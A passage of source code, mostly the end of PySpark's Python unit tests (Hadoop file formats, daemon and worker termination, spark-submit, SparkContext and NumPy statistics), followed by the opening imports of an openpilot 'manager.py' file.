self.assertEqual(hello, result)
def test_newolderror(self):
basepath = self.tempdir.name
self.assertRaises(Exception, lambda: self.sc.hadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
def test_bad_inputs(self):
basepath = self.tempdir.name
self.assertRaises(Exception, lambda: self.sc.sequenceFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.io.NotValidWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.hadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.NotValidInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.NotValidInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
def test_converters(self):
# use of custom converters
basepath = self.tempdir.name
maps = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfmap/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable",
keyConverter="org.apache.spark.api.python.TestInputKeyConverter",
valueConverter="org.apache.spark.api.python.TestInputValueConverter").collect())
em = [(u'\x01', []),
(u'\x01', [3.0]),
(u'\x02', [1.0]),
(u'\x02', [1.0]),
(u'\x03', [2.0])]
self.assertEqual(maps, em)
def test_binary_files(self):
path = os.path.join(self.tempdir.name, "binaryfiles")
os.mkdir(path)
data = b"short binary data"
with open(os.path.join(path, "part-0000"), 'wb') as f:
f.write(data)
[(p, d)] = self.sc.binaryFiles(path).collect()
self.assertTrue(p.endswith("part-0000"))
self.assertEqual(d, data)
def test_binary_records(self):
path = os.path.join(self.tempdir.name, "binaryrecords")
os.mkdir(path)
with open(os.path.join(path, "part-0000"), 'w') as f:
for i in range(100):
f.write('%04d' % i)
result = self.sc.binaryRecords(path, 4).map(int).collect()
self.assertEqual(list(range(100)), result)
class OutputFormatTests(ReusedPySparkTestCase):
def setUp(self):
self.tempdir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(self.tempdir.name)
def tearDown(self):
shutil.rmtree(self.tempdir.name, ignore_errors=True)
@unittest.skipIf(sys.version >= "3", "serialize array of byte")
def test_sequencefiles(self):
basepath = self.tempdir.name
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.sc.parallelize(ei).saveAsSequenceFile(basepath + "/sfint/")
ints = sorted(self.sc.sequenceFile(basepath + "/sfint/").collect())
self.assertEqual(ints, ei)
ed = [(1.0, u'aa'), (1.0, u'aa'), (2.0, u'aa'), (2.0, u'bb'), (2.0, u'bb'), (3.0, u'cc')]
self.sc.parallelize(ed).saveAsSequenceFile(basepath + "/sfdouble/")
doubles = sorted(self.sc.sequenceFile(basepath + "/sfdouble/").collect())
self.assertEqual(doubles, ed)
ebs = [(1, bytearray(b'\x00\x07spam\x08')), (2, bytearray(b'\x00\x07spam\x08'))]
self.sc.parallelize(ebs).saveAsSequenceFile(basepath + "/sfbytes/")
bytes = sorted(self.sc.sequenceFile(basepath + "/sfbytes/").collect())
self.assertEqual(bytes, ebs)
et = [(u'1', u'aa'),
(u'2', u'bb'),
(u'3', u'cc')]
self.sc.parallelize(et).saveAsSequenceFile(basepath + "/sftext/")
text = sorted(self.sc.sequenceFile(basepath + "/sftext/").collect())
self.assertEqual(text, et)
eb = [(1, False), (1, True), (2, False), (2, False), (2, True), (3, True)]
self.sc.parallelize(eb).saveAsSequenceFile(basepath + "/sfbool/")
bools = sorted(self.sc.sequenceFile(basepath + "/sfbool/").collect())
self.assertEqual(bools, eb)
en = [(1, None), (1, None), (2, None), (2, None), (2, None), (3, None)]
self.sc.parallelize(en).saveAsSequenceFile(basepath + "/sfnull/")
nulls = sorted(self.sc.sequenceFile(basepath + "/sfnull/").collect())
self.assertEqual(nulls, en)
em = [(1, {}),
(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(2, {1.0: u'cc'}),
(3, {2.0: u'dd'})]
self.sc.parallelize(em).saveAsSequenceFile(basepath + "/sfmap/")
maps = self.sc.sequenceFile(basepath + "/sfmap/").collect()
for v in maps:
self.assertTrue(v, em)
def test_oldhadoop(self):
basepath = self.tempdir.name
dict_data = [(1, {}),
(1, {"row1": 1.0}),
(2, {"row2": 2.0})]
self.sc.parallelize(dict_data).saveAsHadoopFile(
basepath + "/oldhadoop/",
"org.apache.hadoop.mapred.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable")
result = self.sc.hadoopFile(
basepath + "/oldhadoop/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable").collect()
for v in result:
self.assertTrue(v, dict_data)
conf = {
"mapred.output.format.class": "org.apache.hadoop.mapred.SequenceFileOutputFormat",
"mapreduce.job.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapreduce.job.output.value.class": "org.apache.hadoop.io.MapWritable",
"mapreduce.output.fileoutputformat.outputdir": basepath + "/olddataset/"
}
self.sc.parallelize(dict_data).saveAsHadoopDataset(conf)
input_conf = {"mapreduce.input.fileinputformat.inputdir": basepath + "/olddataset/"}
result = self.sc.hadoopRDD(
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable",
conf=input_conf).collect()
for v in result:
self.assertTrue(v, dict_data)
def test_newhadoop(self):
basepath = self.tempdir.name
data = [(1, ""),
(1, "a"),
(2, "bcdf")]
self.sc.parallelize(data).saveAsNewAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text")
result = sorted(self.sc.newAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
self.assertEqual(result, data)
conf = {
"mapreduce.job.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapreduce.job.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapreduce.job.output.value.class": "org.apache.hadoop.io.Text",
"mapreduce.output.fileoutputformat.outputdir": basepath + "/newdataset/"
}
self.sc.parallelize(data).saveAsNewAPIHadoopDataset(conf)
input_conf = {"mapreduce.input.fileinputformat.inputdir": basepath + "/newdataset/"}
new_dataset = sorted(self.sc.newAPIHadoopRDD(
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text",
conf=input_conf).collect())
self.assertEqual(new_dataset, data)
@unittest.skipIf(sys.version >= "3", "serialize of array")
def test_newhadoop_with_array(self):
basepath = self.tempdir.name
# use custom ArrayWritable types and converters to handle arrays
array_data = [(1, array('d')),
(1, array('d', [1.0, 2.0, 3.0])),
(2, array('d', [3.0, 4.0, 5.0]))]
self.sc.parallelize(array_data).saveAsNewAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.DoubleArrayToWritableConverter")
result = sorted(self.sc.newAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter").collect())
self.assertEqual(result, array_data)
conf = {
"mapreduce.job.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapreduce.job.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapreduce.job.output.value.class": "org.apache.spark.api.python.DoubleArrayWritable",
"mapreduce.output.fileoutputformat.outputdir": basepath + "/newdataset/"
}
self.sc.parallelize(array_data).saveAsNewAPIHadoopDataset(
conf,
valueConverter="org.apache.spark.api.python.DoubleArrayToWritableConverter")
input_conf = {"mapreduce.input.fileinputformat.inputdir": basepath + "/newdataset/"}
new_dataset = sorted(self.sc.newAPIHadoopRDD(
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter",
conf=input_conf).collect())
self.assertEqual(new_dataset, array_data)
def test_newolderror(self):
basepath = self.tempdir.name
rdd = self.sc.parallelize(range(1, 4)).map(lambda x: (x, "a" * x))
self.assertRaises(Exception, lambda: rdd.saveAsHadoopFile(
basepath + "/newolderror/saveAsHadoopFile/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat"))
self.assertRaises(Exception, lambda: rdd.saveAsNewAPIHadoopFile(
basepath + "/newolderror/saveAsNewAPIHadoopFile/",
"org.apache.hadoop.mapred.SequenceFileOutputFormat"))
def test_bad_inputs(self):
basepath = self.tempdir.name
rdd = self.sc.parallelize(range(1, 4)).map(lambda x: (x, "a" * x))
self.assertRaises(Exception, lambda: rdd.saveAsHadoopFile(
basepath + "/badinputs/saveAsHadoopFile/",
"org.apache.hadoop.mapred.NotValidOutputFormat"))
self.assertRaises(Exception, lambda: rdd.saveAsNewAPIHadoopFile(
basepath + "/badinputs/saveAsNewAPIHadoopFile/",
"org.apache.hadoop.mapreduce.lib.output.NotValidOutputFormat"))
def test_converters(self):
# use of custom converters
basepath = self.tempdir.name
data = [(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(3, {2.0: u'dd'})]
self.sc.parallelize(data).saveAsNewAPIHadoopFile(
basepath + "/converters/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
keyConverter="org.apache.spark.api.python.TestOutputKeyConverter",
valueConverter="org.apache.spark.api.python.TestOutputValueConverter")
converted = sorted(self.sc.sequenceFile(basepath + "/converters/").collect())
expected = [(u'1', 3.0),
(u'2', 1.0),
(u'3', 2.0)]
self.assertEqual(converted, expected)
def test_reserialization(self):
basepath = self.tempdir.name
x = range(1, 5)
y = range(1001, 1005)
data = list(zip(x, y))
rdd = self.sc.parallelize(x).zip(self.sc.parallelize(y))
rdd.saveAsSequenceFile(basepath + "/reserialize/sequence")
result1 = sorted(self.sc.sequenceFile(basepath + "/reserialize/sequence").collect())
self.assertEqual(result1, data)
rdd.saveAsHadoopFile(
basepath + "/reserialize/hadoop",
"org.apache.hadoop.mapred.SequenceFileOutputFormat")
result2 = sorted(self.sc.sequenceFile(basepath + "/reserialize/hadoop").collect())
self.assertEqual(result2, data)
rdd.saveAsNewAPIHadoopFile(
basepath + "/reserialize/newhadoop",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
result3 = sorted(self.sc.sequenceFile(basepath + "/reserialize/newhadoop").collect())
self.assertEqual(result3, data)
conf4 = {
"mapred.output.format.class": "org.apache.hadoop.mapred.SequenceFileOutputFormat",
"mapreduce.job.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapreduce.job.output.value.class": "org.apache.hadoop.io.IntWritable",
"mapreduce.output.fileoutputformat.outputdir": basepath + "/reserialize/dataset"}
rdd.saveAsHadoopDataset(conf4)
result4 = sorted(self.sc.sequenceFile(basepath + "/reserialize/dataset").collect())
self.assertEqual(result4, data)
conf5 = {"mapreduce.job.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapreduce.job.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapreduce.job.output.value.class": "org.apache.hadoop.io.IntWritable",
"mapreduce.output.fileoutputformat.outputdir": basepath + "/reserialize/newdataset"
}
rdd.saveAsNewAPIHadoopDataset(conf5)
result5 = sorted(self.sc.sequenceFile(basepath + "/reserialize/newdataset").collect())
self.assertEqual(result5, data)
def test_malformed_RDD(self):
basepath = self.tempdir.name
# non-batch-serialized RDD[[(K, V)]] should be rejected
data = [[(1, "a")], [(2, "aa")], [(3, "aaa")]]
rdd = self.sc.parallelize(data, len(data))
self.assertRaises(Exception, lambda: rdd.saveAsSequenceFile(
basepath + "/malformed/sequence"))
class DaemonTests(unittest.TestCase):
def connect(self, port):
from socket import socket, AF_INET, SOCK_STREAM
sock = socket(AF_INET, SOCK_STREAM)
sock.connect(('127.0.0.1', port))
# send a split index of -1 to shutdown the worker
sock.send(b"\xFF\xFF\xFF\xFF")
sock.close()
return True
def do_termination_test(self, terminator):
from subprocess import Popen, PIPE
from errno import ECONNREFUSED
# start daemon
daemon_path = os.path.join(os.path.dirname(__file__), "daemon.py")
python_exec = sys.executable or os.environ.get("PYSPARK_PYTHON")
daemon = Popen([python_exec, daemon_path], stdin=PIPE, stdout=PIPE)
# read the port number
port = read_int(daemon.stdout)
# daemon should accept connections
self.assertTrue(self.connect(port))
# request shutdown
terminator(daemon)
time.sleep(1)
# daemon should no longer accept connections
try:
self.connect(port)
except EnvironmentError as exception:
self.assertEqual(exception.errno, ECONNREFUSED)
else:
self.fail("Expected EnvironmentError to be raised")
def test_termination_stdin(self):
"""Ensure that daemon and workers terminate when stdin is closed."""
self.do_termination_test(lambda daemon: daemon.stdin.close())
def test_termination_sigterm(self):
"""Ensure that daemon and workers terminate on SIGTERM."""
from signal import SIGTERM
self.do_termination_test(lambda daemon: os.kill(daemon.pid, SIGTERM))
class WorkerTests(ReusedPySparkTestCase):
def test_cancel_task(self):
temp = tempfile.NamedTemporaryFile(delete=True)
temp.close()
path = temp.name
def sleep(x):
import os
import time
with open(path, 'w') as f:
f.write("%d %d" % (os.getppid(), os.getpid()))
time.sleep(100)
# start job in background thread
def run():
try:
self.sc.parallelize(range(1), 1).foreach(sleep)
except Exception:
pass
import threading
t = threading.Thread(target=run)
t.daemon = True
t.start()
daemon_pid, worker_pid = 0, 0
while True:
if os.path.exists(path):
with open(path) as f:
data = f.read().split(' ')
daemon_pid, worker_pid = map(int, data)
break
time.sleep(0.1)
# cancel jobs
self.sc.cancelAllJobs()
t.join()
for i in range(50):
try:
os.kill(worker_pid, 0)
time.sleep(0.1)
except OSError:
break # worker was killed
else:
self.fail("worker has not been killed after 5 seconds")
try:
os.kill(daemon_pid, 0)
except OSError:
self.fail("daemon had been killed")
# run a normal job
rdd = self.sc.parallelize(xrange(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_after_exception(self):
def raise_exception(_):
raise Exception()
rdd = self.sc.parallelize(xrange(100), 1)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: rdd.foreach(raise_exception))
self.assertEqual(100, rdd.map(str).count())
def test_after_jvm_exception(self):
tempFile = tempfile.NamedTemporaryFile(delete=False)
tempFile.write(b"Hello World!")
tempFile.close()
data = self.sc.textFile(tempFile.name, 1)
filtered_data = data.filter(lambda x: True)
self.assertEqual(1, filtered_data.count())
os.unlink(tempFile.name)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: filtered_data.count())
rdd = self.sc.parallelize(xrange(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_accumulator_when_reuse_worker(self):
from pyspark.accumulators import INT_ACCUMULATOR_PARAM
acc1 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(xrange(100), 20).foreach(lambda x: acc1.add(x))
self.assertEqual(sum(range(100)), acc1.value)
acc2 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(xrange(100), 20).foreach(lambda x: acc2.add(x))
self.assertEqual(sum(range(100)), acc2.value)
self.assertEqual(sum(range(100)), acc1.value)
def test_reuse_worker_after_take(self):
rdd = self.sc.parallelize(xrange(100000), 1)
self.assertEqual(0, rdd.first())
def count():
try:
rdd.count()
except Exception:
pass
t = threading.Thread(target=count)
t.daemon = True
t.start()
t.join(5)
self.assertTrue(not t.isAlive())
self.assertEqual(100000, rdd.count())
def test_with_different_versions_of_python(self):
rdd = self.sc.parallelize(range(10))
rdd.count()
version = self.sc.pythonVer
self.sc.pythonVer = "2.0"
try:
with QuietTest(self.sc):
self.assertRaises(Py4JJavaError, lambda: rdd.count())
finally:
self.sc.pythonVer = version
class SparkSubmitTests(unittest.TestCase):
def setUp(self):
self.programDir = tempfile.mkdtemp()
self.sparkSubmit = os.path.join(os.environ.get("SPARK_HOME"), "bin", "spark-submit")
def tearDown(self):
shutil.rmtree(self.programDir)
def createTempFile(self, name, content, dir=None):
"""
Create a temp file with the given name and content and return its path.
Strips leading spaces from content up to the first '|' in each line.
"""
pattern = re.compile(r'^ *\|', re.MULTILINE)
content = re.sub(pattern, '', content.strip())
if dir is None:
path = os.path.join(self.programDir, name)
else:
os.makedirs(os.path.join(self.programDir, dir))
path = os.path.join(self.programDir, dir, name)
with open(path, "w") as f:
f.write(content)
return path
def createFileInZip(self, name, content, ext=".zip", dir=None, zip_name=None):
"""
Create a zip archive containing a file with the given content and return its path.
Strips leading spaces from content up to the first '|' in each line.
"""
pattern = re.compile(r'^ *\|', re.MULTILINE)
content = re.sub(pattern, '', content.strip())
if dir is None:
path = os.path.join(self.programDir, name + ext)
else:
path = os.path.join(self.programDir, dir, zip_name + ext)
zip = zipfile.ZipFile(path, 'w')
zip.writestr(name, content)
zip.close()
return path
def create_spark_package(self, artifact_name):
group_id, artifact_id, version = artifact_name.split(":")
self.createTempFile("%s-%s.pom" % (artifact_id, version), ("""
|<?xml version="1.0" encoding="UTF-8"?>
|<project xmlns="http://maven.apache.org/POM/4.0.0"
| xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
| xsi:schemaLocation="http://maven.apache.org/POM/4.0.0
| http://maven.apache.org/xsd/maven-4.0.0.xsd">
| <modelVersion>4.0.0</modelVersion>
| <groupId>%s</groupId>
| <artifactId>%s</artifactId>
| <version>%s</version>
|</project>
""" % (group_id, artifact_id, version)).lstrip(),
os.path.join(group_id, artifact_id, version))
self.createFileInZip("%s.py" % artifact_id, """
|def myfunc(x):
| return x + 1
""", ".jar", os.path.join(group_id, artifact_id, version),
"%s-%s" % (artifact_id, version))
def test_single_script(self):
"""Submit and test a single script file"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(lambda x: x * 2).collect())
""")
proc = subprocess.Popen([self.sparkSubmit, script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 4, 6]", out.decode('utf-8'))
def test_script_with_local_functions(self):
"""Submit and test a single script file calling a global function"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|def foo(x):
| return x * 3
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(foo).collect())
""")
proc = subprocess.Popen([self.sparkSubmit, script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[3, 6, 9]", out.decode('utf-8'))
def test_module_dependency(self):
"""Submit and test a script with a dependency on another module"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(myfunc).collect())
""")
zip = self.createFileInZip("mylib.py", """
|def myfunc(x):
| return x + 1
""")
proc = subprocess.Popen([self.sparkSubmit, "--py-files", zip, script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out.decode('utf-8'))
def test_module_dependency_on_cluster(self):
"""Submit and test a script with a dependency on another module on a cluster"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(myfunc).collect())
""")
zip = self.createFileInZip("mylib.py", """
|def myfunc(x):
| return x + 1
""")
proc = subprocess.Popen([self.sparkSubmit, "--py-files", zip, "--master",
"local-cluster[1,1,1024]", script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out.decode('utf-8'))
def test_package_dependency(self):
"""Submit and test a script with a dependency on a Spark Package"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(myfunc).collect())
""")
self.create_spark_package("a:mylib:0.1")
proc = subprocess.Popen([self.sparkSubmit, "--packages", "a:mylib:0.1", "--repositories",
"file:" + self.programDir, script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out.decode('utf-8'))
def test_package_dependency_on_cluster(self):
"""Submit and test a script with a dependency on a Spark Package on a cluster"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(myfunc).collect())
""")
self.create_spark_package("a:mylib:0.1")
proc = subprocess.Popen([self.sparkSubmit, "--packages", "a:mylib:0.1", "--repositories",
"file:" + self.programDir, "--master",
"local-cluster[1,1,1024]", script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out.decode('utf-8'))
def test_single_script_on_cluster(self):
"""Submit and test a single script on a cluster"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|def foo(x):
| return x * 2
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(foo).collect())
""")
# this will fail if you have different spark.executor.memory
# in conf/spark-defaults.conf
proc = subprocess.Popen(
[self.sparkSubmit, "--master", "local-cluster[1,1,1024]", script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 4, 6]", out.decode('utf-8'))
def test_user_configuration(self):
"""Make sure user configuration is respected (SPARK-19307)"""
script = self.createTempFile("test.py", """
|from pyspark import SparkConf, SparkContext
|
|conf = SparkConf().set("spark.test_config", "1")
|sc = SparkContext(conf = conf)
|try:
| if sc._conf.get("spark.test_config") != "1":
| raise Exception("Cannot find spark.test_config in SparkContext's conf.")
|finally:
| sc.stop()
""")
proc = subprocess.Popen(
[self.sparkSubmit, "--master", "local", script],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode, msg="Process failed with error:\n {0}".format(out))
class ContextTests(unittest.TestCase):
def test_failed_sparkcontext_creation(self):
# Regression test for SPARK-1550
self.assertRaises(Exception, lambda: SparkContext("an-invalid-master-name"))
def test_get_or_create(self):
with SparkContext.getOrCreate() as sc:
self.assertTrue(SparkContext.getOrCreate() is sc)
def test_parallelize_eager_cleanup(self):
with SparkContext() as sc:
temp_files = os.listdir(sc._temp_dir)
rdd = sc.parallelize([0, 1, 2])
post_parallalize_temp_files = os.listdir(sc._temp_dir)
self.assertEqual(temp_files, post_parallalize_temp_files)
def test_set_conf(self):
# This is for an internal use case. When there is an existing SparkContext,
# SparkSession's builder needs to set configs into SparkContext's conf.
sc = SparkContext()
sc._conf.set("spark.test.SPARK16224", "SPARK16224")
self.assertEqual(sc._jsc.sc().conf().get("spark.test.SPARK16224"), "SPARK16224")
sc.stop()
def test_stop(self):
sc = SparkContext()
self.assertNotEqual(SparkContext._active_spark_context, None)
sc.stop()
self.assertEqual(SparkContext._active_spark_context, None)
def test_with(self):
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
self.assertEqual(SparkContext._active_spark_context, None)
def test_with_exception(self):
try:
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
raise Exception()
except:
pass
self.assertEqual(SparkContext._active_spark_context, None)
def test_with_stop(self):
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
sc.stop()
self.assertEqual(SparkContext._active_spark_context, None)
def test_progress_api(self):
with SparkContext() as sc:
sc.setJobGroup('test_progress_api', '', True)
rdd = sc.parallelize(range(10)).map(lambda x: time.sleep(100))
def run():
try:
rdd.count()
except Exception:
pass
t = threading.Thread(target=run)
t.daemon = True
t.start()
# wait for scheduler to start
time.sleep(1)
tracker = sc.statusTracker()
jobIds = tracker.getJobIdsForGroup('test_progress_api')
self.assertEqual(1, len(jobIds))
job = tracker.getJobInfo(jobIds[0])
self.assertEqual(1, len(job.stageIds))
stage = tracker.getStageInfo(job.stageIds[0])
self.assertEqual(rdd.getNumPartitions(), stage.numTasks)
sc.cancelAllJobs()
t.join()
# wait for event listener to update the status
time.sleep(1)
job = tracker.getJobInfo(jobIds[0])
self.assertEqual('FAILED', job.status)
self.assertEqual([], tracker.getActiveJobsIds())
self.assertEqual([], tracker.getActiveStageIds())
sc.stop()
def test_startTime(self):
with SparkContext() as sc:
self.assertGreater(sc.startTime, 0)
class ConfTests(unittest.TestCase):
def test_memory_conf(self):
memoryList = ["1T", "1G", "1M", "1024K"]
for memory in memoryList:
sc = SparkContext(conf=SparkConf().set("spark.python.worker.memory", memory))
l = list(range(1024))
random.shuffle(l)
rdd = sc.parallelize(l, 4)
self.assertEqual(sorted(l), rdd.sortBy(lambda x: x).collect())
sc.stop()
class KeywordOnlyTests(unittest.TestCase):
class Wrapped(object):
@keyword_only
def set(self, x=None, y=None):
if "x" in self._input_kwargs:
self._x = self._input_kwargs["x"]
if "y" in self._input_kwargs:
self._y = self._input_kwargs["y"]
return x, y
def test_keywords(self):
w = self.Wrapped()
x, y = w.set(y=1)
self.assertEqual(y, 1)
self.assertEqual(y, w._y)
self.assertIsNone(x)
self.assertFalse(hasattr(w, "_x"))
def test_non_keywords(self):
w = self.Wrapped()
self.assertRaises(TypeError, lambda: w.set(0, y=1))
def test_kwarg_ownership(self):
# test _input_kwargs is owned by each class instance and not a shared static variable
class Setter(object):
@keyword_only
def set(self, x=None, other=None, other_x=None):
if "other" in self._input_kwargs:
self._input_kwargs["other"].set(x=self._input_kwargs["other_x"])
self._x = self._input_kwargs["x"]
a = Setter()
b = Setter()
a.set(x=1, other=b, other_x=2)
self.assertEqual(a._x, 1)
self.assertEqual(b._x, 2)
@unittest.skipIf(not _have_scipy, "SciPy not installed")
class SciPyTests(PySparkTestCase):
"""General PySpark tests that depend on scipy """
def test_serialize(self):
from scipy.special import gammaln
x = range(1, 5)
expected = list(map(gammaln, x))
observed = self.sc.parallelize(x).map(gammaln).collect()
self.assertEqual(expected, observed)
@unittest.skipIf(not _have_numpy, "NumPy not installed")
class NumPyTests(PySparkTestCase):
"""General PySpark tests that depend on numpy """
def test_statcounter_array(self):
x = self.sc.parallelize([np.array([1.0, 1.0]), np.array([2.0, 2.0]), np.array([3.0, 3.0])])
s = x.stats()
self.assertSequenceEqual([2.0, 2.0], s.mean().tolist())
self.assertSequenceEqual([1.0, 1.0], s.min().tolist())
self.assertSequenceEqual([3.0, 3.0], s.max().tolist())
self.assertSequenceEqual([1.0, 1.0], s.sampleStdev().tolist())
stats_dict = s.asDict()
self.assertEqual(3, stats_dict['count'])
self.assertSequenceEqual([2.0, 2.0], stats_dict['mean'].tolist())
self.assertSequenceEqual([1.0, 1.0], stats_dict['min'].tolist())
self.assertSequenceEqual([3.0, 3.0], stats_dict['max'].tolist())
self.assertSequenceEqual([6.0, 6.0], stats_dict['sum'].tolist())
self.assertSequenceEqual([1.0, 1.0], stats_dict['stdev'].tolist())
self.assertSequenceEqual([1.0, 1.0], stats_dict['variance'].tolist())
stats_sample_dict = s.asDict(sample=True)
self.assertEqual(3, stats_dict['count'])
self.assertSequenceEqual([2.0, 2.0], stats_sample_dict['mean'].tolist())
self.assertSequenceEqual([1.0, 1.0], stats_sample_dict['min'].tolist())
self.assertSequenceEqual([3.0, 3.0], stats_sample_dict['max'].tolist())
self.assertSequenceEqual([6.0, 6.0], stats_sample_dict['sum'].tolist())
self.assertSequenceEqual(
[0.816496580927726, 0.816496580927726], stats_sample_dict['stdev'].tolist())
self.assertSequenceEqual(
[0.6666666666666666, 0.6666666666666666], stats_sample_dict['variance'].tolist())
if __name__ == "__main__":
from pyspark.tests import *
if not _have_scipy:
print("NOTE: Skipping SciPy tests as it does not seem to be installed")
if not _have_numpy:
print("NOTE: Skipping NumPy tests as it does not seem to be installed")
if xmlrunner:
unittest.main(testRunner=xmlrunner.XMLTestRunner(output='target/test-reports'))
else:
unittest.main()
if not _have_scipy:
print("NOTE: SciPy tests were skipped as it does not seem to be installed")
if not _have_numpy:
print("NOTE: NumPy tests were skipped as it does not seem to be installed")
|
manager.py
|
#!/usr/bin/env python3
import datetime
import os
import signal
import subprocess
import sys
import traceback
from multiprocessing import Process
from typing import List, Tuple, Union
import cereal.messaging as messaging
import selfdrive.sentry as sentry
from common.basedir import BASEDIR
from common.params import Params, ParamKeyType
from common.text_window import TextWindow
from selfdrive.boardd.set_time import set_time
from selfdrive.hardware import HARDWARE, PC, EON
from selfdrive.manager.helpers import unblock_stdout
from selfdrive.manager.process import ensure_running, launcher
from selfdrive.manager.process_config import managed_processes
from selfdrive.athena.registration import register, UNREGISTERED_DONGLE_ID
from selfdrive.swaglog import cloudlog, add_file_handler
from selfdrive.version import is_dirty, get_commit, get_version, get_origin, get_short_branch, \
terms_version, training_version
from selfdrive.hardware.eon.apk import system
sys.path.append(os.path.join(BASEDIR, "pyextra"))
def manager_init() -> None:
# update system time from panda
set_time(cloudlog)
